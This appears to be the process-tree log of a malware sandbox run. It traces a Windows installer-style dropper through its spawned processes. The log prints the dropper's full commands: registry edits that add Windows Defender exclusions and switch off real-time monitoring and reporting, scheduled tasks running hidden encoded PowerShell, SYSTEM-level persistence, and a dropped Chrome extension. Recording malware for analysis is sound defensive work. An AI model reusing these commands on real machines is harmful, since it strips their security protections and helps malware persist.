cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2752 wrote to memory of 2880 2752 cmd.exe 37 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2724 wrote to memory of 2460 2724 cmd.exe 38 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2752 wrote to memory of 2572 2752 cmd.exe 39 PID 2724 wrote to memory of 2600 2724 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe"C:\Users\Admin\AppData\Local\Temp\509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\7zS1600.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\7zS17B5.tmp\Install.exe.\Install.exe /qdidBlVkf "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2880
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2572
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2460
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2600
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXOeMITWT" /SC once /ST 21:09:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXOeMITWT"4⤵PID:2480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXOeMITWT"4⤵PID:1840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btbwILgIDOMomJfKYB" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exe\" RD /xssite_idmTA 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1940
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2BE43F0A-CE92-423D-8789-5CA4F33CA67E} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]1⤵PID:2556
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2736
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:276
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2312
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1956
-
C:\Windows\system32\taskeng.exetaskeng.exe {053F2CAA-A243-4480-ADCB-69D3623C1D26} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exeC:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\hzbTtSU.exe RD /xssite_idmTA 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXEqSNUjU" /SC once /ST 02:41:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXEqSNUjU"3⤵PID:452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXEqSNUjU"3⤵PID:2444
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2508
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goejZIqJJ" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goejZIqJJ"3⤵PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goejZIqJJ"3⤵PID:1676
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:323⤵PID:804
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:643⤵PID:1508
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:323⤵PID:2224
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:324⤵PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:643⤵PID:2072
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:644⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\gtigoJAOxebpSqst\wcFgIAkr\KoxNlNXoGtRJCtKF.wsf"3⤵PID:1424
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\gtigoJAOxebpSqst\wcFgIAkr\KoxNlNXoGtRJCtKF.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2024 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:324⤵PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:644⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:324⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:644⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:324⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:644⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:324⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:644⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:324⤵PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:644⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:324⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\dTRdFhcsEOtGTQVB" /t REG_DWORD /d 0 /reg:644⤵PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:324⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH" /t REG_DWORD /d 0 /reg:644⤵PID:800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:324⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gtigoJAOxebpSqst" /t REG_DWORD /d 0 /reg:644⤵PID:1788
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbsdSKdqS" /SC once /ST 09:01:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbsdSKdqS"3⤵PID:1752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbsdSKdqS"3⤵PID:1912
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2476
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:844
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tbikxcbubRAutxvXV" /SC once /ST 02:29:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\jVZhyNO.exe\" wJ /MPsite_idrMM 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tbikxcbubRAutxvXV"3⤵PID:1320
-
-
-
C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\jVZhyNO.exeC:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\jVZhyNO.exe wJ /MPsite_idrMM 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2664 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btbwILgIDOMomJfKYB"3⤵PID:2976
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2280
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2624
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2988
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KuTytnbkU\nkFeSs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BDcYZHwUBrpBRcy" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BDcYZHwUBrpBRcy2" /F /xml "C:\Program Files (x86)\KuTytnbkU\UxCngSm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BDcYZHwUBrpBRcy"3⤵PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BDcYZHwUBrpBRcy"3⤵PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KahIcFOoKkuAuC" /F /xml "C:\Program Files (x86)\iyzAqDqghgpU2\KaaRexl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VzRRkeuRReYYm2" /F /xml "C:\ProgramData\dTRdFhcsEOtGTQVB\pJbVnAs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1152
-
-
